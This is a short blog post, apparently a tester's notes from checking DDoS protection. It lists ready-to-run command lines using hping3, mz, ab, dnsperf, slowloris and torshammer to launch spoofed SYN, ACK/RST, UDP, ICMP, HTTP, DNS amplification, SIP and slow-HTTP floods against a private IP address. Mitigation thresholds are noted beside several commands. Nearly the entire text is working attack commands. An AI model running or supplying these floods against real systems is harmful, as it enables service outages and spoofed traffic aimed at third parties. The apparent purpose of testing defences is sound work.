Month: February 2019

Example Network Attacks

February 4, 2019

Following are some example TCP/UDP Attack we can do from a Linux system for testing purposes.

TCP SYN and FIN
hping3 10.247.225.134 -a 60.1.1.1 -p 80 -SF -i u1000 (ip anomaly check) Done.

TCP ACK and RST Floods (ACK)

hping3 10.247.225.134 -a 60.1.1.2 -s 10005 -p 80 -P -A -k -i u1000 -d 60 (out-of-seq ñ over 30 packets per conn)

sudo hping3 10.247.225.134 -s 10005 -p 80 -P -A -k -i u10 -d 60

TCP ACK and RST Floods (RST)

hping3 10.247.225.134 -s 10009 -p 80 -R -i u10 (SYN Authentication ñ sent bad ack to client)

UDP Floods (NTP, DNS, SSDP) (DNS)

sudo mz -c 100000000 -B 10.247.225.134 -A rand -t dns “sp=10000,dp=53,q=www.aaa.com” -d 10u (DNS auth)
sudo mz -c 100000000 -B 10.247.225.134 -A rand -t udp “sp=10000,dp=53,p=aa:aa:aa:aa:aa:aa:aa” -d 10u (Malformed DNS)

UDP Floods (NTP, DNS, SSDP) (SSDP)

sudo mz -c 100000000 -B 10.247.225.134 -A rand -t udp “sp=10000,dp=1900,p=aa:aa:aa:aa:aa:aa:aa” -d 10u (udp auth)

UDP Floods (NTP, DNS, SSDP) (NTP)

mz -c 100000000 -B 10.247.225.134 -A rand -t udp “sp=10000,dp=123,p=aa:aa:aa:aa:aa:aa:aa” -d 10u (udp auth)

ICMP Floods

hping3 10.247.225.134 –icmp -C 3 -i u1000 –rand-source (ICMP type 3 -> drop)
done

HTTP GET/POST Flood

ab -n 10000000 -c 10 -r http://10.247.225.134:81/ (HTTP Auth ñ 302 redirect) – Need Investigation

DNS torture (DNS sub-domain)

sudo dnsperf -d dnsfile -s 10.247.225.134 -l 100 -Q 1000 -a 10.10.10.12 -v (DNS label length (suffix=2) >= 8 -> drop)
done – Script Issue

DNS/NTP amplification (DNS)

sudo hping3 10.247.225.134 -a 60.1.1.10 –udp -d 1470 -p 2000 -s 53 –keep -i u10 (udp maximum size = 1400)

DNS/NTP amplification (NTP)

hping3 10.247.225.134 -a 60.1.1.11 –udp -d 1470 -p 2000 -s 123 –keep -i u1000 (udp maximum size = 1400)

SIP Floods (Malformed SIP)

sudo mz -c 100000000 -B 10.247.225.134 -A 40.1.1.2 -t udp “sp=10000,dp=5061,p=aa:aa:aa:aa:aa:aa:aa” -d 1000u (Malformed SIP)

Slowris
./slowloris.pl -dns 10.247.225.134 -timeout 10 -num 2000 (HTTP header timeout = 5 -> Reset)

Slow Post
sudo ./torshammer.py -t 10.247.225.134 -r 100 (Post packet size <= 150 bytes , Number Packets >= 10)

Sockstress
sudo ab -n 100000 -c 500 -r http://10.247.225.134/ (current connections rate limit by source > 500 -> drop)